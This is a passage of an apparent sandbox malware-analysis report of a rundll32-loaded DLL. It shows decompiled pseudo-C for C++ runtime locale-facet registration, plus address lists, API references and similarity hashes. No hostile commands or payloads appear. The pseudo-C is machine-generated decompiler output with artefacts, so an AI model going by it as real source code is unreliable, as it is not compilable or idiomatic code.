																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E21C295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1E1438(_t283);
																									E6E223D74(_t330 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e26851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e26c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E21D028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E220075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E206FD3(__eflags, _t313);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e2c6e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E206FD3(__eflags, _t312);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e2c6e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E206FD3(__eflags, _t311);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e2c6e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E206FD3(__eflags, _t310);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e2c6e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E206FD3(__eflags, _t309);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e2c6e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E206FD3(__eflags, _t308);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e2c6e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E206FD3(__eflags, _t307);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e2c6e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6e21b7f2
0x6e21b7f2
0x6e21b7f9
0x6e21b803
0x6e21b808
0x6e21b813
0x6e21b817
0x6e21b81a
0x6e21b81f
0x6e21b823
0x6e21b828
0x6e21b82c
0x6e21b871
0x6e21b874
0x6e21b880
0x6e21b82e
0x6e21b830
0x6e21b836
0x6e21b83c
0x6e21b844
0x6e21b847
0x6e21b884
0x6e21b892
0x6e21b897
0x6e21b89f
0x6e21b8a9
0x6e21b8ae
0x6e21b8b9
0x6e21b8bd
0x6e21b8c0
0x6e21b8c5
0x6e21b8ce
0x6e21b8d0
0x6e21b8d2
0x6e21b917
0x6e21b91a
0x6e21b926
0x6e21b8d4
0x6e21b8d4
0x6e21b8d6
0x6e21b8dc
0x6e21b8e2
0x6e21b8ea
0x6e21b8ed
0x6e21b92a
0x6e21b938
0x6e21b93d
0x6e21b945
0x6e21b94f
0x6e21b954
0x6e21b95f
0x6e21b963
0x6e21b966
0x6e21b96b
0x6e21b974
0x6e21b976
0x6e21b978
0x6e21b9bd
0x6e21b9c0
0x6e21b9cc
0x6e21b97a
0x6e21b97a
0x6e21b97c
0x6e21b982
0x6e21b988
0x6e21b990
0x6e21b993
0x6e21b9d0
0x6e21b9de
0x6e21b9e3
0x6e21b9eb
0x6e21b9f5
0x6e21b9fa
0x6e21ba05
0x6e21ba09
0x6e21ba0c
0x6e21ba11
0x6e21ba1a
0x6e21ba1c
0x6e21ba1e
0x6e21ba63
0x6e21ba66
0x6e21ba72
0x6e21ba20
0x6e21ba20
0x6e21ba22
0x6e21ba28
0x6e21ba2e
0x6e21ba36
0x6e21ba39
0x6e21ba76
0x6e21ba84
0x6e21ba89
0x6e21ba91
0x6e21ba9b
0x6e21baa0
0x6e21baab
0x6e21baaf
0x6e21bab2
0x6e21bab7
0x6e21bac0
0x6e21bac2
0x6e21bac4
0x6e21bb09
0x6e21bb0c
0x6e21bb18
0x6e21bac6
0x6e21bac6
0x6e21bac8
0x6e21bace
0x6e21bad4
0x6e21badc
0x6e21badf
0x6e21bb1c
0x6e21bb2a
0x6e21bb2f
0x6e21bb37
0x6e21bb41
0x6e21bb46
0x6e21bb51
0x6e21bb55
0x6e21bb58
0x6e21bb5d
0x6e21bb66
0x6e21bb68
0x6e21bb6a
0x6e21bbaf
0x6e21bbb2
0x6e21bbbe
0x6e21bb6c
0x6e21bb6c
0x6e21bb6e
0x6e21bb74
0x6e21bb7a
0x6e21bb82
0x6e21bb85
0x6e21bbc2
0x6e21bbd0
0x6e21bbd5
0x6e21bbdd
0x6e21bbe7
0x6e21bbec
0x6e21bbf7
0x6e21bbfb
0x6e21bbfe
0x6e21bc03
0x6e21bc0c
0x6e21bc0e
0x6e21bc10
0x6e21bc55
0x6e21bc58
0x6e21bc64
0x6e21bc12
0x6e21bc12
0x6e21bc14
0x6e21bc1a
0x6e21bc20
0x6e21bc28
0x6e21bc2b
0x6e21bc65
0x6e21bc68
0x6e21bc76
0x6e21bc7b
0x6e21bc83
0x6e21bc88
0x6e21bc8a
0x6e21bc90
0x6e21bc93
0x6e21bc9c
0x6e21bc9c
0x6e21bc9c
0x6e21bca0
0x6e21bca6
0x6e21bca9
0x6e21bcb5
0x6e21bc2d
0x6e21bc2d
0x6e21bc30
0x6e21bc34
0x6e21bc38
0x6e21bc45
0x6e21bc4d
0x6e21bc4f
0x00000000
0x6e21bc4f
0x6e21bc16
0x6e21bc16
0x00000000
0x6e21bc16
0x6e21bc14
0x6e21bb87
0x6e21bb87
0x6e21bb8a
0x6e21bb8e
0x6e21bb92
0x6e21bb9f
0x6e21bba7
0x6e21bba9
0x00000000
0x6e21bba9
0x6e21bb70
0x6e21bb70
0x00000000
0x6e21bb70
0x6e21bb6e
0x6e21bae1
0x6e21bae1
0x6e21bae4
0x6e21bae8
0x6e21baec
0x6e21baf9
0x6e21bb01
0x6e21bb03
0x00000000
0x6e21bb03
0x6e21baca
0x6e21baca
0x00000000
0x6e21baca
0x6e21bac8
0x6e21ba3b
0x6e21ba3b
0x6e21ba3e
0x6e21ba42
0x6e21ba46
0x6e21ba53
0x6e21ba5b
0x6e21ba5d
0x00000000
0x6e21ba5d
0x6e21ba24
0x6e21ba24
0x00000000
0x6e21ba24
0x6e21ba22
0x6e21b995
0x6e21b995
0x6e21b998
0x6e21b99c
0x6e21b9a0
0x6e21b9ad
0x6e21b9b5
0x6e21b9b7
0x00000000
0x6e21b9b7
0x6e21b97e
0x6e21b97e
0x00000000
0x6e21b97e
0x6e21b97c
0x6e21b8ef
0x6e21b8ef
0x6e21b8f2
0x6e21b8f6
0x6e21b8fa
0x6e21b907
0x6e21b90f
0x6e21b911
0x00000000
0x6e21b911
0x6e21b8d8
0x6e21b8d8
0x00000000
0x6e21b8d8
0x6e21b8d6
0x6e21b849
0x6e21b849
0x6e21b84c
0x6e21b850
0x6e21b854
0x6e21b861
0x6e21b869
0x6e21b86b
0x00000000
0x6e21b86b
0x6e21b832
0x6e21b832
0x00000000
0x6e21b832
0x6e21b830

APIs

__EH_prolog3.LIBCMT ref: 6E21B7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B803
int.LIBCPMT ref: 6E21B81A

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

messages.LIBCPMT ref: 6E21B83D
std::_Facet_Register.LIBCPMT ref: 6E21B854
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B874
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21B892

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
Instruction ID: fa31074f765baaf55ad792064010492f97346163ee0330b65fad62241eb71be0
Opcode Fuzzy Hash: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
Instruction Fuzzy Hash: 8311E079D0451ECBCF00EBE4C894AEDB7BBBF48B18F150919E510AB390DBB49A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F567, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t550 - 0x14, 0);
				_t525 =  *0x6e2c6df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6E1E161C(0x6e2c6da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6E2066BA(_t550 - 0x14);
					return E6E220075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6E211127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t550 - 0x20);
							E6E223D74(_t550 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t512, _t525, 0x14);
							E6E206653(_t550 - 0x14, 0);
							_t526 =  *0x6e2c6df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6E1E161C(0x6e2c6da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6E2066BA(_t550 - 0x14);
								return E6E220075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6E2111AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t550 - 0x20);
										E6E223D74(_t550 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t389, _t513, _t526, 0x14);
										E6E206653(_t550 - 0x14, 0);
										_t527 =  *0x6e2c6dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6E1E161C(0x6e2c6d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6E2066BA(_t550 - 0x14);
											return E6E220075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6E211230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t550 - 0x20);
													E6E223D74(_t550 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t389, _t514, _t527, 0x14);
													E6E206653(_t550 - 0x14, 0);
													_t528 =  *0x6e2c6dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6E1E161C(0x6e2c6d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6E2066BA(_t550 - 0x14);
														return E6E220075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6E2112B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t550 - 0x20);
																E6E223D74(_t550 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t389, _t515, _t528, 0x14);
																E6E206653(_t550 - 0x14, 0);
																_t529 =  *0x6e2c6dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6E1E161C(0x6e2c6d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6E2066BA(_t550 - 0x14);
																	return E6E220075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6E211339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t550 - 0x20);
																			E6E223D74(_t550 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t389, _t516, _t529, 0x14);
																			E6E206653(_t550 - 0x14, 0);
																			_t530 =  *0x6e2c6db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6E1E161C(0x6e2c6d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6E2066BA(_t550 - 0x14);
																				return E6E220075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6E2113A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t550 - 0x20);
																						E6E223D74(_t550 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t389, _t517, _t530, 0x14);
																						E6E206653(_t550 - 0x14, 0);
																						_t531 =  *0x6e2c6ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6E1E161C(0x6e2c6d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6E2066BA(_t550 - 0x14);
																							return E6E220075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6E211409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t550 - 0x20);
																									E6E223D74(_t550 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t389, _t518, _t531, 0x14);
																									E6E206653(_t550 - 0x14, 0);
																									_t532 =  *0x6e2c6de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6E1E161C(0x6e2c6d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6E2066BA(_t550 - 0x14);
																										return E6E220075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6E211471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t550 - 0x20);
																												E6E223D74(_t550 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t389, _t519, _t532, 0x14);
																												E6E206653(_t550 - 0x14, 0);
																												_t533 =  *0x6e2c6dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6E1E161C(0x6e2c6da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6E2066BA(_t550 - 0x14);
																													return E6E220075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6E2114EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t550 - 0x20);
																															E6E223D74(_t550 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t389, _t520, _t533, 0x14);
																															E6E206653(_t550 - 0x14, 0);
																															_t534 =  *0x6e2c6dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6E1E161C(0x6e2c6d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6E2066BA(_t550 - 0x14);
																																return E6E220075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6E211558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t550 - 0x20);
																																		E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t389, _t521, _t534, 0x14);
																																		E6E206653(_t550 - 0x14, 0);
																																		_t535 =  *0x6e2c6e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6E1E161C(0x6e2c6dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6E2066BA(_t550 - 0x14);
																																			return E6E220075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6E2115C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t550 - 0x20);
																																					E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t389, _t522, _t535, 0x14);
																																					E6E206653(_t550 - 0x14, 0);
																																					_t536 =  *0x6e2c6dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6E1E161C(0x6e2c6d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6E2066BA(_t550 - 0x14);
																																						return E6E220075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6E21162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6E1E1438(_t473);
																																								E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e26851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6e26c0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6E21542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6E220075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6E206FD3(__eflags, _t523);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6e2c6dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6E206FD3(__eflags, _t522);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6e2c6e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6E206FD3(__eflags, _t521);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6e2c6dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6E206FD3(__eflags, _t520);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6e2c6dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6E206FD3(__eflags, _t519);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6e2c6de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6E206FD3(__eflags, _t518);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6e2c6ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6E206FD3(__eflags, _t517);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6e2c6db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6E206FD3(__eflags, _t516);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6e2c6dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6E206FD3(__eflags, _t515);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6e2c6dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6E206FD3(__eflags, _t514);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6e2c6dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6E206FD3(__eflags, _t513);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6e2c6df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6E206FD3(__eflags, _t512);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6e2c6df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}

0x6e20f567
0x6e20f567
0x6e20f56e
0x6e20f578
0x6e20f57d
0x6e20f588
0x6e20f58c
0x6e20f58f
0x6e20f594
0x6e20f598
0x6e20f59d
0x6e20f5a1
0x6e20f5e6
0x6e20f5e9
0x6e20f5f5
0x6e20f5a3
0x6e20f5a5
0x6e20f5ab
0x6e20f5b1
0x6e20f5b9
0x6e20f5bc
0x6e20f5f9
0x6e20f607
0x6e20f60c
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f643
0x6e20f645
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
0x6e20f662
0x6e20f69f
0x6e20f6ad
0x6e20f6b2
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e9
0x6e20f6eb
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
